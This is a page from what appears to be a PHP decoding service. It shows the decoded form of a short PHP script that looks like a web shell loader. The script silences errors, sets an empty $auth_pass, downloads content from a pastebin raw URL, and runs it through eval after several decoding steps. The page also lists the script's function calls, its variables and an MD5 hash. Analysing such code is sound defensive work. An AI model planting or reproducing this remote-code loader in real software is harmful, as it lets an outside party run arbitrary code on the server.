Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); $auth_pass = ""; ..

Decoded Output download

<?php 
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0); 
$auth_pass = "";  
$hythan= file_get_contents('http://pastebin.com/raw/Qu7ZKGeq'); 
eval(str_rot13(gzinflate(str_rot13(base64_decode(($hythan)))))); 
?>

Did this file decode correctly?

Original Code

<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$auth_pass = ""; 
$hythan= file_get_contents('http://pastebin.com/raw/Qu7ZKGeq');
eval(str_rot13(gzinflate(str_rot13(base64_decode(($hythan))))));
?>

Function Calls

ini_set 2
gzinflate 1
str_rot13 1
base64_decode 1
file_get_contents 1

Variables

$hythan
$auth_pass

Stats

MD5 387b240431cf9acfdc7fe90e8324957b
Eval Count 0
Decode Time 125 ms